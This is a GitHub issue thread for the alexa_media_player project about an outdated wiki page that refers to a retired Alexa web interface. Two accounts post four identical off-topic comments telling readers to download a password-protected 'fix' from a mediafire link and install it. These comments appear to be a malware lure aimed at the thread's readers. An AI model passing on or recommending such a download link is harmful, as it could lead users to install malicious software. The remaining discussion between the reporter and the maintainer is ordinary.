### ISSUE TITLE
Documentation bug:  alexa no longer available in web browser

### ISSUE THREAD

**Issue by rlippmann** [alandtse/alexa_media_player#2495]
**IMPORTANT: Please search the issues, including closed issues, and the [FAQ](https://github.com/alandtse/alexa_media_player/wiki/FAQ) before opening a new issue. The template is mandatory; failure to use it will result in issue closure.**

**Describe the bug**

Wiki document [https://github.com/alandtse/alexa_media_player/wiki/Developers%3A-Sequence-Discovery](url) has instructions to log into the web version of Alexa, which no longer exists.

Should probably remove those instructions.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by alandtse** [comment]
The wiki has open permission. Please edit it if you see issues with it as this is a community effort.

**Comment by rlippmann** [comment]
Strangely, the URL which contains the JSON for the sequences is accessible without logging in.

I'm not sure if that's because I'm logged into Amazon or because I've logged in before.
